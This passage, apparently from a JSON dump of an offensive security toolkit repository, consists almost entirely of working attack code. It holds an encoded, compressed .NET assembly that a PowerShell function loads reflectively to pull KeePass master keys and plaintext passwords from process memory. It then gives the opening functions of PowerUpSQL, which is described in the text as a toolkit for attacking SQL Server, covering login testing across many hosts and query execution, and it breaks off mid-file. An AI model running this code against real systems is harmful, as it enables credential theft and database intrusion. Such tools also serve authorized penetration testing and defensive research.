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'\n        $DeflatedStream = New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String($EncodedCompressedFile),[IO.Compression.CompressionMode]::Decompress)\n        $UncompressedFileBytes = New-Object Byte[](738304)\n        $DeflatedStream.Read($UncompressedFileBytes, 0, 738304) | Out-Null\n        $Assembly = [Reflection.Assembly]::Load($UncompressedFileBytes)\n    }\n\n    PROCESS {\n\n        ForEach($KeePassProcess in $Process) {\n\n            if($KeePassProcess.FileVersion -match '^2\\.') {\n\n                $WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\"\n                $ExecutablePath = $WMIProcess | Select-Object -Expand ExecutablePath\n\n                Write-Verbose \"Examining KeePass process $($KeePassProcess.ID) for master keys\"\n\n                $Keys = $Assembly.GetType('KeeTheft.Program').GetMethod('GetKeePassMasterKeys').Invoke($null, @([System.Diagnostics.Process]$KeePassProcess))\n\n                if($Keys) {\n\n                    ForEach ($Key in $Keys) {\n\n                        ForEach($UserKey in $Key.UserKeys) {\n\n                            $KeyType = $UserKey.GetType().Name\n\n                            $UserKeyObject = New-Object PSObject\n                            $UserKeyObject | Add-Member Noteproperty 'Database' $UserKey.databaseLocation\n                            $UserKeyObject | Add-Member Noteproperty 'KeyType' $KeyType\n                            $UserKeyObject | Add-Member Noteproperty 'KeePassVersion' $KeePassProcess.FileVersion\n                            $UserKeyObject | Add-Member Noteproperty 'ProcessID' $KeePassProcess.ID\n                            $UserKeyObject | Add-Member Noteproperty 'ExecutablePath' $ExecutablePath\n                            $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobAddress' $UserKey.encryptedBlobAddress\n                            $UserKeyObject | Add-Member Noteproperty 'EncryptedBlob' $UserKey.encryptedBlob\n                            $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobLen' $UserKey.encryptedBlobLen\n                            $UserKeyObject | Add-Member Noteproperty 'PlaintextBlob' $UserKey.plaintextBlob\n\n                            if($KeyType -eq 'KcpPassword') {\n                                $Plaintext = [System.Text.Encoding]::UTF8.GetString($UserKey.plaintextBlob)\n                            }\n                            else {\n                                $Plaintext = [Convert]::ToBase64String($UserKey.plaintextBlob)\n                            }\n\n                            $UserKeyObject | Add-Member Noteproperty 'Plaintext' $Plaintext\n\n                            if($KeyType -eq 'KcpUserAccount') {\n                                try {\n                                    $WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\"\n                                    $UserName = $WMIProcess.GetOwner().User\n\n                                    $ProtectedUserKeyPath = Resolve-Path -Path \"$($Env:WinDir | Split-Path -Qualifier)\\Users\\*$UserName*\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin\" -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Path\n\n                                    $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $ProtectedUserKeyPath\n\n                                }\n                                catch {\n                                    Write-Warning \"Error enumerating the owner of $($KeePassProcess.ID) : $_\"\n                                }\n                            }\n                            else {\n                                $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $UserKey.keyFilePath\n                            }\n\n                            $UserKeyObject.PSObject.TypeNames.Insert(0, 'KeePass.Keys')\n                            $UserKeyObject\n                        }\n                    }\n                }\n                else {\n                    Write-Verbose \"No keys found for $($KeePassProcess.ID)\"\n                }\n            }\n            else {\n                Write-Warning \"Only KeePass 2.X is supported at this time.\"\n            }\n        }\n    }\n}\n"
  },
  {
    "path": "modules/PowerUpSQL.ps1",
    "content": "#requires -version 2\n<#\n        File: PowerUpSQL.ps1\n        Author: Scott Sutherland (@_nullbind), NetSPI - 2016\n        Major Contributors: Antti Rantasaari and Eric Gruber\n        Version: 1.0.0.76\n        Description: PowerUpSQL is a PowerShell toolkit for attacking SQL Server.\n        License: BSD 3-Clause\n        Required Dependencies: PowerShell v.2\n        Optional Dependencies: None\n#>\n\n#########################################################################\n#\n#region          CORE FUNCTIONS\n#\n#########################################################################\n\n# ----------------------------------\n#  Get-SQLConnectionObject\n# ----------------------------------\n# Author: Scott Sutherland\n# Reference: https://msdn.microsoft.com/en-us/library/ms188247.aspx\n# Reference: https://raw.githubusercontent.com/sqlcollaborative/dbatools/master/functions/SharedFunctions.ps1\n# Reference: https://blogs.msdn.microsoft.com/spike/2008/11/14/connectionstrings-mixing-usernames-and-windows-authentication-who-goes-first/\nFunction  Get-SQLConnectionObject\n{\n    <#\n            .SYNOPSIS\n            Creates a object for connecting to SQL Server.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Database\n            Default database to connect to.\n            .EXAMPLE\n            PS C:\\> Get-SQLConnectionObject -Username MySQLUser -Password MySQLPassword\n\n            StatisticsEnabled                : False\n            AccessToken                      :\n            ConnectionString                 : Server=SQLServer1;Database=Master;User ID=MySQLUser;Password=MySQLPassword;Connection Timeout=1\n            ConnectionTimeout                : 1\n            Database                         : Master\n            DataSource                       : SQLServer1\n            PacketSize                       : 8000\n            ClientConnectionId               : 00000000-0000-0000-0000-000000000000\n            ServerVersion                    :\n            State                            : Closed\n            WorkstationId                    : SQLServer1\n            Credential                       :\n            FireInfoMessageEventOnUserErrors : False\n            Site                             :\n            Container                        :\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Dedicated Administrator Connection (DAC).')]\n        [Switch]$DAC,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Default database to connect to.')]\n        [String]$Database,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Connection timeout.')]\n        [string]$TimeOut = 1\n    )\n\n    Begin\n    {\n        # Setup DAC string\n        if($DAC)\n        {\n            $DacConn = 'ADMIN:'\n        }\n        else\n        {\n            $DacConn = ''\n        }\n\n        # Set database filter\n        if(-not $Database)\n        {\n            $Database = 'Master'\n        }\n    }\n\n    Process\n    {\n        # Check for instance\n        if ( -not $Instance)\n        {\n            $Instance = $env:COMPUTERNAME\n        }\n\n        # Create connection object\n        $Connection = New-Object -TypeName System.Data.SqlClient.SqlConnection\n\n        # Set authentcation type - current windows user\n        if(-not $Username){\n\n            # Set authentication type\n            $AuthenticationType = \"Current Windows Credentials\"\n\n            # Set connection string\n            $Connection.ConnectionString = \"Server=$DacConn$Instance;Database=$Database;Integrated Security=SSPI;Connection Timeout=1\"\n        }\n        \n        # Set authentcation type - provided windows user\n        if ($username -like \"*\\*\"){\n            $AuthenticationType = \"Provided Windows Credentials\"\n\n            # Setup connection string \n            $Connection.ConnectionString = \"Server=$DacConn$Instance;Database=$Database;Integrated Security=SSPI;uid=$Username;pwd=$Password;Connection Timeout=$TimeOut\"\n        }\n\n        # Set authentcation type - provided sql login\n        if (($username) -and ($username -notlike \"*\\*\")){\n\n            # Set authentication type\n            $AuthenticationType = \"Provided SQL Login\"\n\n            # Setup connection string \n            $Connection.ConnectionString = \"Server=$DacConn$Instance;Database=$Database;User ID=$Username;Password=$Password;Connection Timeout=$TimeOut\"\n        }\n\n        # Return the connection object\n        return $Connection\n    }\n\n    End\n    {\n    }\n}\n\n\n# ----------------------------------\n#  Get-SQLConnectionTest\n# ----------------------------------\n# Author: Scott Sutherland\nFunction  Get-SQLConnectionTest\n{\n    <#\n            .SYNOPSIS\n            Tests if the current Windows account or provided SQL Server login can log into an SQL Server.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER DAC\n            Connect using Dedicated Admin Connection.\n            .PARAMETER Database\n            Default database to connect to.\n            .PARAMETER TimeOut\n            Connection time out.\n            .PARAMETER SuppressVerbose\n            Suppress verbose errors.  Used when function is wrapped.\n            .EXAMPLE\n            PS C:\\> Get-SQLConnectionTest -Verbose -Instance \"SQLSERVER1.domain.com\\SQLExpress\"\n            .EXAMPLE\n            PS C:\\> Get-SQLConnectionTest -Verbose -Instance \"SQLSERVER1.domain.com,1433\"\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceDomain | Get-SQLConnectionTest -Verbose\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipeline = $true,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Connect using Dedicated Admin Connection.')]\n        [Switch]$DAC,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Default database to connect to.')]\n        [String]$Database,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Connection timeout.')]\n        [string]$TimeOut,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Suppress verbose errors.  Used when function is wrapped.')]\n        [switch]$SuppressVerbose\n    )\n\n    Begin\n    {\n        # Setup data table for output\n        $TblResults = New-Object -TypeName System.Data.DataTable\n        $null = $TblResults.Columns.Add('ComputerName')\n        $null = $TblResults.Columns.Add('Instance')\n        $null = $TblResults.Columns.Add('Status')\n    }\n\n    Process\n    {\n        # Parse computer name from the instance\n        $ComputerName = Get-ComputerNameFromInstance -Instance $Instance\n\n        # Default connection to local default instance\n        if(-not $Instance)\n        {\n            $Instance = $env:COMPUTERNAME\n        }\n\n        # Setup DAC string\n        if($DAC)\n        {\n            # Create connection object\n            $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DAC -TimeOut $TimeOut -Database $Database\n        }\n        else\n        {\n            # Create connection object\n            $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -TimeOut $TimeOut -Database $Database\n        }\n\n        # Attempt connection\n        try\n        {\n            # Open connection\n            $Connection.Open()\n\n            if(-not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Success.\"\n            }\n\n            # Add record\n            $null = $TblResults.Rows.Add(\"$ComputerName\",\"$Instance\",'Accessible')\n\n            # Close connection\n            $Connection.Close()\n\n            # Dispose connection\n            $Connection.Dispose()\n        }\n        catch\n        {\n            # Connection failed\n            if(-not $SuppressVerbose)\n            {\n                $ErrorMessage = $_.Exception.Message\n                Write-Verbose -Message \"$Instance : Connection Failed.\"\n                Write-Verbose  -Message \" Error: $ErrorMessage\"\n            }\n\n            # Add record\n            $null = $TblResults.Rows.Add(\"$ComputerName\",\"$Instance\",'Not Accessible')\n        }\n    }\n\n    End\n    {\n        # Return Results\n        $TblResults\n    }\n}\n\n\n# ----------------------------------\n#  Get-SQLConnectionTestThreaded\n# ----------------------------------\n# Author: Scott Sutherland\nFunction  Get-SQLConnectionTestThreaded\n{\n    <#\n            .SYNOPSIS\n            Tests if the current Windows account or provided SQL Server login can log into an SQL Server.  This version support threading using runspaces.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER DAC\n            Connect using Dedicated Admin Connection.\n            .PARAMETER Database\n            Default database to connect to.\n            .PARAMETER TimeOut\n            Connection time out.\n            .PARAMETER SuppressVerbose\n            Suppress verbose errors.  Used when function is wrapped.\n            .PARAMETER Threads\n            Number of concurrent threads.\n            .EXAMPLE\n            PS C:\\> Get-SQLConnectionTestThreaded -Verbose -Instance \"SQLSERVER1.domain.com\\SQLExpress\" -Threads 15\n            .EXAMPLE\n            PS C:\\> Get-SQLConnectionTestThreaded -Verbose -Instance \"SQLSERVER1.domain.com,1433\" -Threads 15\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose -Threads 15\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipeline = $true,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Connect using Dedicated Admin Connection.')]\n        [Switch]$DAC,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Default database to connect to.')]\n        [String]$Database,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Connection timeout.')]\n        [string]$TimeOut,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Number of threads.')]\n        [int]$Threads = 5,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Suppress verbose errors.  Used when function is wrapped.')]\n        [switch]$SuppressVerbose\n    )\n\n    Begin\n    {\n        # Setup data table for output\n        $TblResults = New-Object -TypeName System.Data.DataTable\n        $null = $TblResults.Columns.Add('ComputerName')\n        $null = $TblResults.Columns.Add('Instance')\n        $null = $TblResults.Columns.Add('Status')\n\n        # Setup data table for pipeline threading\n        $PipelineItems = New-Object -TypeName System.Data.DataTable\n\n        # set instance to local host by default\n        if(-not $Instance)\n        {\n            $Instance = $env:COMPUTERNAME\n        }\n\n        # Ensure provided instance is processed\n        if($Instance)\n        {\n            $ProvideInstance = New-Object -TypeName PSObject -Property @{\n                Instance = $Instance\n            }\n        }\n\n        # Add instance to instance list\n        $PipelineItems = $PipelineItems + $ProvideInstance\n    }\n\n    Process\n    {\n        # Create list of pipeline items\n        $PipelineItems = $PipelineItems + $_\n    }\n\n    End\n    {\n        # Define code to be multi-threaded\n        $MyScriptBlock = {\n            # Setup instance\n            $Instance = $_.Instance\n\n            # Parse computer name from the instance\n            $ComputerName = Get-ComputerNameFromInstance -Instance $Instance\n\n            # Setup DAC string\n            if($DAC)\n            {\n                # Create connection object\n                $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DAC -TimeOut $TimeOut -Database $Database\n            }\n            else\n            {\n                # Create connection object\n                $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -TimeOut $TimeOut -Database $Database\n            }\n\n            # Attempt connection\n            try\n            {\n                # Open connection\n                $Connection.Open()\n\n                if(-not $SuppressVerbose)\n                {\n                    Write-Verbose -Message \"$Instance : Connection Success.\"\n                }\n\n                # Add record\n                $null = $TblResults.Rows.Add(\"$ComputerName\",\"$Instance\",'Accessible')\n\n                # Close connection\n                $Connection.Close()\n\n                # Dispose connection\n                $Connection.Dispose()\n            }\n            catch\n            {\n                # Connection failed\n\n                if(-not $SuppressVerbose)\n                {\n                    $ErrorMessage = $_.Exception.Message\n                    Write-Verbose -Message \"$Instance : Connection Failed.\"\n                    #Write-Verbose  \" Error: $ErrorMessage\"\n                }\n\n                # Add record\n                $null = $TblResults.Rows.Add(\"$ComputerName\",\"$Instance\",'Not Accessible')\n            }\n        }\n\n        # Run scriptblock using multi-threading\n        $PipelineItems | Invoke-Parallel -ScriptBlock $MyScriptBlock -ImportSessionFunctions -ImportVariables -Throttle $Threads -RunspaceTimeout 2 -Quiet -ErrorAction SilentlyContinue\n\n        return $TblResults\n    }\n}\n\n\n# ----------------------------------\n#  Get-SQLQuery\n# ----------------------------------\n# Author: Scott Sutherland\nFunction  Get-SQLQuery\n{\n    <#\n            .SYNOPSIS\n            Executes a query on target SQL servers.This\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER DAC\n            Connect using Dedicated Admin Connection.\n            .PARAMETER Database\n            Default database to connect to.\n            .PARAMETER TimeOut\n            Connection time out.\n            .PARAMETER SuppressVerbose\n            Suppress verbose errors.  Used when function is wrapped.\n            .PARAMETER Threads\n            Number of concurrent threads.\n            .PARAMETER Query\n            Query to be executed on the SQL Server.\n            .EXAMPLE\n            PS C:\\> Get-SQLQuery -Verbose -Instance \"SQLSERVER1.domain.com\\SQLExpress\" -Query \"Select @@version\" -Threads 15\n            .EXAMPLE\n            PS C:\\> Get-SQLQuery -Verbose -Instance \"SQLSERVER1.domain.com,1433\" -Query \"Select @@version\" -Threads 15\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceDomain | Get-SQLQuery -Verbose -Query \"Select @@version\" -Threads 15\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server query.')]\n        [string]$Query,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Connect using Dedicated Admin Connection.')]\n        [Switch]$DAC,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Default database to connect to.')]\n        [String]$Database,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Connection timeout.')]\n        [int]$TimeOut,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Suppress verbose errors.  Used when function is wrapped.')]\n        [switch]$SuppressVerbose,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Return error message if exists.')]\n        [switch]$ReturnError\n    )\n\n    Begin\n    {\n        # Setup up data tables for output\n        $TblQueryResults = New-Object -TypeName System.Data.DataTable\n    }\n\n    Process\n    {\n        # Setup DAC string\n        if($DAC)\n        {\n            # Create connection object\n            $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -TimeOut $TimeOut -DAC -Database $Database\n        }\n        else\n        {\n            # Create connection object\n            $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -TimeOut $TimeOut -Database $Database\n        }\n\n        # Parse SQL Server instance name\n        $ConnectionString = $Connection.Connectionstring\n        $Instance = $ConnectionString.split(';')[0].split('=')[1]\n\n        # Check for query\n        if($Query)\n        {\n            # Attempt connection\n            try\n            {\n                # Open connection\n                $Connection.Open()\n\n                if(-not $SuppressVerbose)\n                {\n                    Write-Verbose -Message \"$Instance : Connection Success.\"\n                }\n\n                # Setup SQL query\n                $Command = New-Object -TypeName System.Data.SqlClient.SqlCommand -ArgumentList ($Query, $Connection)\n\n                # Grab results\n                $Results = $Command.ExecuteReader()\n\n                # Load results into data table\n                $TblQueryResults.Load($Results)\n\n                # Close connection\n                $Connection.Close()\n\n                # Dispose connection\n                $Connection.Dispose()\n            }\n            catch\n            {\n                # Connection failed - for detail error use  Get-SQLConnectionTest\n                if(-not $SuppressVerbose)\n                {\n                    Write-Verbose -Message \"$Instance : Connection Failed.\"\n                }\n\n                if($ReturnError)\n                {\n                    $ErrorMessage = $_.Exception.Message\n                    #Write-Verbose  \" Error: $ErrorMessage\"\n                }\n            }\n        }\n        else\n        {\n            Write-Output -InputObject 'No query provided to Get-SQLQuery function.'\n            Break\n        }\n    }\n\n    End\n    {\n        # Return Results\n        if($ReturnError)\n        {\n            $ErrorMessage\n        }\n        else\n        {\n            $TblQueryResults\n        }\n    }\n}\n\n\n# ----------------------------------\n#  Get-SQLQueryThreaded\n# ----------------------------------\n# Author: Scott Sutherland\nFunction  Get-SQLQueryThreaded\n{\n    <#\n            .SYNOPSIS\n            Executes a query on target SQL servers.This version support threading using runspaces.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER DAC\n            Connect using Dedicated Admin Connection.\n            .PARAMETER Database\n            Default database to connect to.\n            .PARAMETER TimeOut\n            Connection time out.\n            .PARAMETER SuppressVerbose\n            Suppress verbose errors.  Used when function is wrapped.\n            .PARAMETER Threads\n            Number of concurrent host threads.\n            .PARAMETER Query\n            Query to be executed on the SQL Server.\n            .EXAMPLE\n            PS C:\\> Get-SQLQueryThreaded -Verbose -Instance \"SQLSERVER1.domain.com\\SQLExpress\" -Query \"Select @@version\" -Threads 15\n            .EXAMPLE\n            PS C:\\> Get-SQLQueryThreaded -Verbose -Instance \"SQLSERVER1.domain.com,1433\" -Query \"Select @@version\" -Threads 15\n            .EXAMPLE\n            PS 